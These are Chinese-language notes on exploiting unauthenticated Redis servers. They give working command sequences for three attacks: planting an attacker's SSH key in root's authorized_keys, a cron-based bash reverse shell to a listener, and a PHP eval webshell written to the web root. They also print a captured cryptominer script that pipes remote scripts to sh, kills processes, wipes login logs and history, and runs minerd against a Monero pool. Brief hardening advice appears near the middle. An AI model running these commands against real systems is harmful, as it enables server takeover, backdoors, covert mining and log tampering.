利用https://paper.seebug.org/409/
加固https://help.aliyun.com/knowledge_detail/37447.html
阿里云服务器被挖矿程序minerd入侵的终极解决办法http://blog.csdn.net/tjcyjd/article/details/54140321
redis命令总结https://maoxian.de/2015/08/1342.html
攻击条件
Redis 服务默认绑定在 0.0.0.0:6379 暴露到公网上!
如果在【没有开启认证】的情况下:导致可以访问目标服务器的任意用户,未授权访问Redis以及读取Redis的数据。
服务器启动redis
whereis redis
#加上&号 使 redis 以后台程序方式运行
./redis-server &
连接 redis未授权服务器
redis -h 10.125.155.30 -p 6379
keys *
#查看某个key的值
get kkkky
info #查看redis版本信息、一些具体信息、服务器版本信息等
#开启监视器 实时转储收到的请求(从此时开始记录每个redis命令操作 到文件ksdf.log)
redis-cli -h xx.xx.xx. monitor >ksdf.log
方式1 利用Redis自身方法 写服务器的文件 (ssh-key公钥)
将hacker的公钥 追加 写入 redis服务器的 /root/.ssh 文件夹下的authotrized_keys文件中,即hacker主机 直接登录 该服务器。
"公钥登录" 原理很简单,就是用户将自己的公钥储存在远程主机上。
登录的时候,远程主机会向用户发送一段随机字符串,用户用自己的私钥加密后,再发回来。远程主机用事先储存的公钥进行解密,如果成功,就证明用户是可信的,直接允许登录shell,不再要求密码。
这种方法要求用户必须提供自己的公钥。如果没有现成的,可以直接用ssh-keygen生成一个:
$ ssh-keygen
运行上面的命令以后,系统会出现一系列提示,可以一路回车。其中有一个问题是,要不要对私钥设置口令(passphrase),如果担心私钥的安全,这里可以设置一个。
运行结束以后,在$HOME/.ssh/目录下,会新生成两个文件:id_rsa.pub和id_rsa。前者是你的公钥,后者是你的私钥。
通常这时再输入下面的命令,将公钥传送到远程主机host上面:
$ ssh-copy-id user@host
authorized_keys文件:远程主机将用户的公钥,保存在登录后的用户主目录的$HOME/.ssh/authorized_keys文件中。公钥就是一段字符串,只要把它追加在authorized_keys文件的末尾就行了。
#进入/.ssh目录
cd ~
cd .ssh/
# 本机 生成ssh公钥文件gy
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > gy.txt
# 利用redis-cli 连接 该服务器
redis-cli -h 173.239.46.188
# 删除所有数据库以及key!!((保证写入的数据不掺杂其他数据)慎用 !!
flushall
# 把公钥文件gy (通过redis自身方法) 写入 服务器的内存 返回OK
cat gy.txt | redis-cli -h 173.239.46.188 -x set crackit
# 利用redis查看当前目录
173.239.46.188:6379> config get dir
1) "dir"
2) "/var/spool/cron"
# 进入目录 设置保存路径 /Users/用户名/.ssh 可能OK 也可能非root用户权限不足(error) ERR Changing directory: Permission denied
173.239.46.188:6379> config set dir /root/.ssh/
# 设置数据库名
173.239.46.188:6379> config set dbfilename "authorized_keys"
OK
# 保存数据库的内容到/root/.ssh/authorized_keys 会覆盖之前的!! 会导致之前设置的所有ssh免登录失效!!!
173.239.46.188:6379> save
OK
#-------------------------------------------------
# 通过自己本机的私钥登陆服务器
ssh -i id_rsa root@173.239.46.188
当如果发现自己的Redis突然被清空,在0号默认库中执行 keys * 命令只显示
"crackit" 或者其他奇怪的key,那么“恭喜”你中招了。
0×05修复建议
1.对自己的Redis加入认证,除非必要,否则不要把自身暴露到公网中,也不要以root启用Redis。
2.iptables 对自用固定的端口开启白名单。
3.查看自己的authorized_keys,以及crontab 任务,如果包含REDIS的开头,请重置。
4.确认自己被hack的机器,请检查 chkrootkit和 rootkit hunter检查rootkit。
方式2 利用定时任务执行命令反弹shell
redis 以 root 权限运行时:
可以写 crontab 来执行命令反弹shell
--
Redis的set1 ‘xxx’命令使得写入数据始终在最前,保证执行成功,但写入数据较大(来源猪猪侠@wooyun)
crontab 对执行的文件格式要求比较松散。
在centos里写入到/var/spool/cron目录。
# 在redis未授权机器上查询定时任务
crontab -u root -l
#*/5 * * * * curl -fsSL http://218.248.40.228:8443/i.sh?6 | sh
基本格式 :
* * * * * command
分 时 日 月 周 命令
# 删除所有的执行计划
service crond stop或 crontab -r
先在hacker自己的服务器192.168.1.1上监听一个端口 nc -lvnp 4444
连接目标redis服务器 执行命令:
redis-cli -h 192.168.2.2
set x "\n* * * * * bash -i >& /dev/tcp/192.168.1.1/4444 0>&1\n"
config set dir /var/spool/cron/
config set dbfilename root
save
方式3 在web目录 写文件 获取webshell
当 redis 权限不高,并且服务器开着 web 服务且在 redis 有 web 目录写权限时:往 web 路径写 webshell
config set dir /var/www/html/
config set dbfilename shell.php
set x "<?php @eval($_POST['caidao']);?>"
save
挖矿脚本
在目标的redis上创建了两个关键key,一个名为woxdtzfwar、另一个名为crackit。
内容分别为:
可访问 http://172.104.190.64:8220/test11.sh 获取最新url
woxdtzfwar文件
*/1 * * * * /usr/bin/curl -fsSLhttp://172.104.190.64:8220/test11.sh | sh
其中shell脚本即
#!/bin/bash
(ps auxf|grep -v grep|grep cryptonight |awk '{print $2}'|xargs kill -9;crontab -r;pkill -9 minerd;pkill -9 i586;pkill -9 gddr;pkill -9 snapd;pkill -9 atd;echo > /var/log/wtmp;history -c;cd ~;curl -L http://198.181.41.97:8220/minerd -o minerd;chmod 777 minerd;setsid ./minerd -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:3333 -u 41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29TpKXpm3zKTUYo -p x &>>/dev/null)
crackit的内容为:
ssh-rsaAAAAB3NzaC1yc2EAAAADAQABAAABAQDE0guChoiGr6s3mXjQA0wX6YKNNMy2bpj6b8ArjuWH/mjN17bu275t/ZlSarmMC5hCVAx7eJEzqxqy43AiBS61UuFpWZXWal5b6XWdvrH6pCJOI5+ceeFMEmc64B7GNrs2OPyuaP0HST/xh0YyWwoE/2uZmc3EyiR8sIP7/11N+xhHH4nIZB/M8QDaBRN6DWUNd/kzLDuIHr4LntuhKEZpCuQIuiDm7ZBYzbYhGtpPWnO04FzbfMUqP1JssTd/G/mUflRgQhKVACyF8rd8o/o7Zy6I9JVgLV6FpNOLc5Ep9VJuFXxmcxWc+Bj//Sd4pgn4gbmb8GzAvlH2xxw+SV2hredis@redis.io
对挖矿脚本 具体解释如下:
#!/bin/bash
#利用ps命令列举进程,看是否已经有存在名为minerd进程,如有则杀掉进程
(ps auxf|grep -v grep|grep cryptonight |awk '{print $2}'|xargs kill -9;
#清除当前用户crontab任务列表
crontab -r;
#杀进程再次杀进程,分别为minerd/i586/gddr进程名,猜测是否为病毒早前感染程序名)
pkill -9 minerd;
pkill -9 i586;
pkill -9 gddr;
pkill -9 snapd;
pkill -9 atd;
#清日志
echo > /var/log/wtmp;#系统每次登录,都会在此日志中添加记录,该文件为二进制文件
#清空命令操作日志
history -c;
#回到用户家目录
cd ~;
#下载自己服务器上的minerd到 被黑的redis服务器
curl -L http://198.181.41.97:8220/minerd -o minerd;
#增加执行权限
chmod 777 minerd;
# setsid命令, minnerd进程执行后守护进程
setsid ./minerd -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:3333 -u 41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29TpKXpm3zKTUYo -p x &>>/dev/null)
其中,minnerd为挖矿程序,连接的服务器为 xmr.crypto-pool.fr:3333,挖矿帐号为41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29TpKXpm3zKTUYo,密码为x(这个密码选项无所谓,值可随便设置)
利用百度搜索 minerd,搜索结果显示 minerd 是一个臭名昭著的比特币挖矿程序。其中攻击方式、sh文件内容等基本一样,说明该攻击是基于redis未授权漏洞的病毒。
网络上发表的基于minerd的下载url为:curl -L http://67.209.185.118:8220/minerd -o minerd
该页面已经失效不能访问
该病毒面对的目标系统是linux系统(crontab启动方式、curl下载、minerd挖矿程序等)
此外,幸运的是本次客户redis安装在windows操作系统(info查看),病毒无法在windows系统下运行